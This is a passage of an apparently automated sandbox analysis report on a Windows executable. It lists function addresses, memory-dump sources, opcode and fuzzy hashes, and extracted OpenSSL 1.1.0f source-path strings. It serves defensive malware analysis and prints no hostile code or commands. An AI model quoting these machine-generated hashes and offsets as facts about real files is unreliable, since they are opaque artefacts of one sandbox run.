                                  • Opcode Fuzzy Hash: 19e51ccb60a2791c75152ed210bfd7c75904f6c83a4fe1ad1b21dc1d09005ba4
                                  • Instruction Fuzzy Hash: 0B3114718006496FCB248E78CC84EFA7BAEDB81354F0082ECF81ED7251E6B09E858B50
                                  Function 006734C0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e66db1529f6e64ae402a5f57a502f0849d465a18ed4042c3b93763ec7c2b541a
                                  • Instruction ID: 1669507398cf7299e32e49bf3e0ab7fefe57103ef408537346f5e2500c7c1358
                                  • Opcode Fuzzy Hash: e66db1529f6e64ae402a5f57a502f0849d465a18ed4042c3b93763ec7c2b541a
                                  • Instruction Fuzzy Hash: A9023D71E002299BDF14CFA9C9806EDB7F2EF48314F258269E919E7344D731AA41DB94
                                  Function 00622370 Relevance: 3.2, Strings: 1, Instructions: 1922COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: <#b
                                  • API String ID: 0-3475354355
                                  • Opcode ID: a33de9480ec9c35ec85f10a33f59c2ce030acdddaa6af375090e52c2f23a173c
                                  • Instruction ID: 9b29e891a787150f5fa7d491816d70d8a534b8054fd437c4b479be276f74d76b
                                  • Opcode Fuzzy Hash: a33de9480ec9c35ec85f10a33f59c2ce030acdddaa6af375090e52c2f23a173c
                                  • Instruction Fuzzy Hash: 6DD23FB2F083544BDB1C8E19ECB167EB6D2BBD4204F0E852EF48BC3381EE7555199689
                                  Function 005F3790 Relevance: 3.0, Strings: 2, Instructions: 509COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ..\..\openssl-1.1.0f\crypto\bn\bn_recp.c$Vp^
                                  • API String ID: 0-543820952
                                  • Opcode ID: ed2e5a39b3dcd3f3a33393f65134698b568e832ab918d4a18dae1d34e87caebd
                                  • Instruction ID: c8225921bb884dc06d9cb9eb85984cfdc779be11d73ec82ec1364de0df06d8e0
                                  • Opcode Fuzzy Hash: ed2e5a39b3dcd3f3a33393f65134698b568e832ab918d4a18dae1d34e87caebd
                                  • Instruction Fuzzy Hash: 94220971A083148FD354CF69C48064AFBE2BFCC314F598A6DE9989B316E771E916CB81
                                  Function 005DE010 Relevance: 2.8, Strings: 2, Instructions: 294COMMON
                                  Download Yara Rule
                                  Strings
                                  • .%lu, xrefs: 005DE297
                                  • ..\..\openssl-1.1.0f\crypto\objects\obj_dat.c, xrefs: 005DE27D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .%lu$..\..\openssl-1.1.0f\crypto\objects\obj_dat.c
                                  • API String ID: 0-85154685
                                  • Opcode ID: a32914986315e97b741afe7b0c6922aae8202d9dbbf882c1c66dae6e3a56c72a
                                  • Instruction ID: a32ae77b3af042220ebe08ee0b4387888f3975d7f35c8a7025722b496d60f4da
                                  • Opcode Fuzzy Hash: a32914986315e97b741afe7b0c6922aae8202d9dbbf882c1c66dae6e3a56c72a
                                  • Instruction Fuzzy Hash: 92910371A083429BD731AE6D988673BBFE8BF95344F44092FF8859B342E771D904C692
                                  Function 00616A90 Relevance: 2.8, Strings: 2, Instructions: 280COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 2-by$expa
                                  • API String ID: 0-3278378397
                                  • Opcode ID: 11f6e8e2b3cc51e80353b7a2663130facf9df37a2a1c27d123c8f2797cba41f1
                                  • Instruction ID: db8c2cf30b41ae393013776f9ad6a9bb03fc6291880b6ee24a6a2db36ce7f6af
                                  • Opcode Fuzzy Hash: 11f6e8e2b3cc51e80353b7a2663130facf9df37a2a1c27d123c8f2797cba41f1
                                  • Instruction Fuzzy Hash: EFC1B3B2A183418FC754CF29C48065AFBE2BFD8344F559A2EF598D3211E770EA498F46
                                  Function 005E8B00 Relevance: 2.8, Strings: 2, Instructions: 250COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: gfff$jjj
                                  • API String ID: 0-3352304714
                                  • Opcode ID: 0988731474202fb27a5ad55fc1d73069558f5422338a9be7f0ce6e9f0b5d86ec
                                  • Instruction ID: 3239c0e361b91912d0607e82bf1194cdac95ccb6ed7c7658d035768f57fa8980
                                  • Opcode Fuzzy Hash: 0988731474202fb27a5ad55fc1d73069558f5422338a9be7f0ce6e9f0b5d86ec
                                  • Instruction Fuzzy Hash: 8391E4B09043469FC714EF39AC497377BA9FB94344F04592AF989D7252EF34D9088B92
                                  Function 00605510 Relevance: 2.4, Strings: 1, Instructions: 1150COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: A__
                                  • API String ID: 0-1223570203
                                  • Opcode ID: d6f7dc12975aaec907bef987af8bbd2ce596bd37e97cb4d3ff2444c42d9b5dae
                                  • Instruction ID: e559558d938c4582bf334faa0e232d074e6be723a7e66ce6e20335824e3bf4f0
                                  • Opcode Fuzzy Hash: d6f7dc12975aaec907bef987af8bbd2ce596bd37e97cb4d3ff2444c42d9b5dae
                                  • Instruction Fuzzy Hash: C4923E76A308554BC71CEF19FC625267363B75F35174A521AE203CF790EA29FA23EA40
                                  Function 00606530 Relevance: 2.3, Strings: 1, Instructions: 1078COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: e_
                                  • API String ID: 0-124733211
                                  • Opcode ID: 4fa4d393343cb4def561535e859b4c5f3fff969e0915e1030c81407b91f38318
                                  • Instruction ID: 1d101a22824b3e4ad6b998050e9468fe4c8031555e679bca799bb7c96e6b52c7
                                  • Opcode Fuzzy Hash: 4fa4d393343cb4def561535e859b4c5f3fff969e0915e1030c81407b91f38318
                                  • Instruction Fuzzy Hash: B9920C76A308554BC71CEF19FC625267363B75F35174A521AE203CF790EA29FA23EA40
                                  Function 00648A20 Relevance: 2.0, Strings: 1, Instructions: 790COMMONLIBRARYCODE
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ..\..\openssl-1.1.0f\crypto\ec\ec_mult.c
                                  • API String ID: 0-4193766086
                                  • Opcode ID: 15d54c08585963810f3c7c78ab8a844bceac7c082ba319fa20a19552d57c6b7f
                                  • Instruction ID: 0845defe1add6195d41a25dc75eb716d61a49e34215f835a3b4064df7b809c0f
                                  • Opcode Fuzzy Hash: 15d54c08585963810f3c7c78ab8a844bceac7c082ba319fa20a19552d57c6b7f
                                  • Instruction Fuzzy Hash: C9526C71A483029FD720DF58C881B9BBBE2BF84744F14082DFA8597392DBB1D945CB92
                                  Function 0064C9C0 Relevance: 1.9, Strings: 1, Instructions: 668COMMON
                                  Download Yara Rule
                                  Strings
                                  • ggen..\..\openssl-1.1.0f\crypto\dsa\dsa_gen.c, xrefs: 0064D096
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ggen..\..\openssl-1.1.0f\crypto\dsa\dsa_gen.c
                                  • API String ID: 0-4085895449
                                  • Opcode ID: 53440b64d50da7cf3afdc6534c9ee3cfedb27e613df8d75394b835c4f257e32c
                                  • Instruction ID: 62c95c2b7578b7e42bfe57a835b11d74fe1b24b0f280636d290260b7c579e567
                                  • Opcode Fuzzy Hash: 53440b64d50da7cf3afdc6534c9ee3cfedb27e613df8d75394b835c4f257e32c
                                  • Instruction Fuzzy Hash: 4032B371908342ABD731AF649C05B6BBBEABFC5744F04082DF98893352E771E915CB52
                                  Function 0064C270 Relevance: 1.8, Strings: 1, Instructions: 550COMMON
                                  Download Yara Rule
                                  Strings
                                  • ..\..\openssl-1.1.0f\crypto\dsa\dsa_gen.c, xrefs: 0064C34A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ..\..\openssl-1.1.0f\crypto\dsa\dsa_gen.c
                                  • API String ID: 0-3552984871
                                  • Opcode ID: be78e62c5e64a88b1e6b044ae07d322e2ef6d4d2092b0afb0319f5c67eb70c58
                                  • Instruction ID: 7b833e94dbc2e543496c8231e0162f89b69011ea81a6eb93ef528b217cab5e1f
                                  • Opcode Fuzzy Hash: be78e62c5e64a88b1e6b044ae07d322e2ef6d4d2092b0afb0319f5c67eb70c58
                                  • Instruction Fuzzy Hash: 7212E671919341ABD760AB74DC45FAFBBEABF84354F04082EF98892352E731D950C762
                                  Function 0060A370 Relevance: 1.7, Strings: 1, Instructions: 468COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ]p_
                                  • API String ID: 0-1338921314
                                  • Opcode ID: 823f790f840fa1ec558894f0099daee8b5da7571923d0e8d3a981fc2dc55c7cc
                                  • Instruction ID: d5eda93aa63627fd34c3b4cb6f33cc6cce182817943c88c5ccd964e06a2c10b1
                                  • Opcode Fuzzy Hash: 823f790f840fa1ec558894f0099daee8b5da7571923d0e8d3a981fc2dc55c7cc
                                  • Instruction Fuzzy Hash: BB028F3050D3D14FD319CF2D889056AFFE1AAD6241F488A9EF4E5CB383D529D609CBA2
                                  Function 006075B0 Relevance: 1.7, Strings: 1, Instructions: 406COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: a_
                                  • API String ID: 0-1077840241
                                  • Opcode ID: 6a8c18c6e69379e227438806f98ade2acb2a5c9f236a0f4dd24a5f14cf2ec8e8
                                  • Instruction ID: 09c46c756df0085ffae154d61b04aa0e4e8ac271217f4ed374614c63d9ffd9e0
                                  • Opcode Fuzzy Hash: 6a8c18c6e69379e227438806f98ade2acb2a5c9f236a0f4dd24a5f14cf2ec8e8
                                  • Instruction Fuzzy Hash: 44F1732050D3D58FD359CF2D485046AFFE1AAD6241F4886AEF4E5DB383C638D609CBA2
                                  Function 0065F5F0 Relevance: 1.7, Strings: 1, Instructions: 401COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID: 0-3916222277
                                  • Opcode ID: 6dd7b99ce50a78bb793786b1abbebd8984d00144d135d6dfebe97f7c5614d0eb
                                  • Instruction ID: 48b6931a786c020a9d5a1a3ac4160d8031faf4f7b07585056198bc603af9cfa0
                                  • Opcode Fuzzy Hash: 6dd7b99ce50a78bb793786b1abbebd8984d00144d135d6dfebe97f7c5614d0eb
                                  • Instruction Fuzzy Hash: 80F16E71A087468FC710CF28C48096ABBE2FFD9345F144A2DF99997352EB31E949CB52
                                  Function 005D27E4 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                  Download Yara Rule
                                  APIs
                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 005D27FA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID: FeaturePresentProcessor
                                  • String ID:
                                  • API String ID: 2325560087-0
                                  • Opcode ID: bec588fe5431f74dd64d559377b2ee2e118b8f851078bab74d27eac21c171e70
                                  • Instruction ID: 7757293d53c3d03ecd441ffb159df4055d7f1915f284150de9a4c4d7fab2e264
                                  • Opcode Fuzzy Hash: bec588fe5431f74dd64d559377b2ee2e118b8f851078bab74d27eac21c171e70
                                  • Instruction Fuzzy Hash: AF5137B2A012058BEB24CF58D8857AEBBF1FB98314F24852BD455EB350D374DA40DB90
                                  Function 0060CA40 Relevance: 1.6, Strings: 1, Instructions: 389COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: {|_
                                  • API String ID: 0-3753583676
                                  • Opcode ID: a033b74eb878ecafc27d123d0f18be1796d91dedcb04b286b3c53f7163df274d
                                  • Instruction ID: f1a9a103bc0845b581c043b419ed29a89d81256a2a5da85ac7d9b721a6fabe69
                                  • Opcode Fuzzy Hash: a033b74eb878ecafc27d123d0f18be1796d91dedcb04b286b3c53f7163df274d
                                  • Instruction Fuzzy Hash: 0DE1852051D3D55FD759CF2D889006EBFE1AAD6201B48869EF8E4DB383C628D615CBA2
                                  Function 005EA380 Relevance: 1.6, Strings: 1, Instructions: 341COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4480744565.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                  • Associated: 00000000.00000002.4480710164.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480814640.0000000000681000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480860914.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480889887.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480918564.00000000006D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.4480976677.00000000006DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c0000_win_gui.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: ..\..\openssl-1.1.0f\crypto\rsa\rsa_oaep.c
                                  • API String ID: 0-4203199248
                                  • Opcode ID: d5fccce148f451053fc875131166697beeea20f0deaf9303a033671b56311058
